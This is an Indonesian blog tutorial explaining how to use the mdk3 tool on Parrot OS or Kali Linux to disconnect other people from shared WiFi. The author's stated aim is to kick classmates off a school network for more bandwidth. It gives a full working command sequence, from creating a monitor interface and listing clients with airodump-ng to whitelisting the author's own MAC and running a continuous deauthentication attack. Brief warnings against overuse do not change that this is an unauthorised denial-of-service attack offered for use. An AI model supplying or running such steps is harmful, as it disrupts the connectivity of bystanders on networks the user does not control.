Tutorial Memutus Koneksi WiFi Orang Lain Menggunakan MDK3

Tutorial Memutus Koneksi WiFi Orang Lain Menggunakan MDK3
Daftar Isi Artikel

Pastinya para pembaca pernah ke cafe, wifi.id, atau tempat lain yang menyediakan koneksi WiFi untuk umum baik yang berbayar maupun yang gratis. Penulis sendiri sering sekali pergi ke sekolah ketika tidak punya uang dan paket internet sama sekali hanya untuk mencari wifi gratis untuk mengerjakkan tugas ataupun scrolling sosial media. Maklum saja, penulis sendiri merupakan anak kost jadi harus pintar-pintar mengatur keuangan.

Sering kali koneksi wifi ini lemot bahkan down tidak bisa digunakan karena banyaknya user dan bandwidth yang kecil.Sebenarnya ya tidak boleh mengeluh, karena memang wifi sekolah kan wifi umum dan juga gratis untuk semua siswa tetapi kalau sedang mengerjakkan tugas atau hal penting lain tentu sangat menyebalkan. Apalagi melihat para user menggunakan untuk hal tidak penting seperti membuka youtube atau bermain game.

Akhirnya penulis pun mempunyai cara memutus koneksi mereka dari wifi sekolah yaitu dengan menggunakan tools mdk3 yang terdapat di distro kali linux dan parrot OS (penulis mempraktekkannya di parrot OS). Mdk3 ini merupakan singkatan dari “Murdered Death Kill 3” yang berfungsi untuk memutus jaringan wifi orang lain. Mdk3 tidak perlu diinstall pada kali linux maupun parrot OS (versi security) karena sudah otomatis terinstall. Sebelum kita mencoba tools mdk3 ini, penulis ingin memperingatkan jangan menggunakan tools ini secara iseng atau berlebihan karena dapat merugikan orang lain.

Bayangkan ketika pembaca menggunakan tools ini di WiFi corner dan sedang ada yang melakukan wawancara online kemudian jaringannya terganggu dan akhirnya dia tidak diterima, tentu ini sangat merugikan orang tersebut.

DAFTAR ISI


Cara menggunakan mdk3


Baik menggunakan kali linux maupun parrot os tidak ada bedanya. Untuk menjalankan tutorial ini, kita terlebih dahulu harus masuk sebagai root.

1. Membuat Adapter Wireless Menjalankan Fungsi monitor. Monitor disini maksudnya memonitoring jaringan WiFi yang sedang digunakan.


Perintah : iw dev wlan0 interface add wlan0mon type monitor

Membuat adapter wireless

2. Melihat Siapa saja yang Terhubung ke Koneksi WiFi yang Sedang Kita Gunakan.

Perintah : airodump-ng wlan0mon

Berikut gambar setelah perintah dijalankan dan mungkin saja hasilnya akan berbeda ketika dicoba pembaca dikarenakan pada saat membuat tutorial ini, perangkat yang terkoneksi wifi hanya perangkat penulis.

Melihat siapa saja yang terhubung 

Untuk keluar dari perintah tadi, tekan CTRL+C

3. Melihat alamat mac address adapter wireless.


Perintah : ifconfig wlan0

Melihat alamat mac address 

4. Copy Alamat Mac Address dan Jadikan File Berekstensi .txt


Perintah : echo mac address kamu >> whitelist.txt

Copy alamat mac address

5. Menjalankan Tools Mdk3


Perintah : mdk3 wlan0mon d -w whitelist.txt

Perintah ini akan memutus semua koneksi wifi kecuali alamat mac address yang ada pada whitelist.txt secara berkala setiap 3 detik.

Menjalankan tools mdk3

Menghentikan Pemutusan Koneksi

Untuk menghentikan pemutusan koneksi wifi ini gunakan perintah:

airmon-ng stop wlan0mon

Menghentikan pemutusan koneksi

Sekian tutorial menggunakan tools mdk3 dari penulis. Sekali lagi penulis ingin memperingatkan jangan gunakan tools ini secara berlebihan karena kita tidak tahu sedang tahu sedang merampas apa dari orang lain dan serugi apa mereka. Akhir kata, saya ucapkan terima kasih.

Penulis : Widi Afandi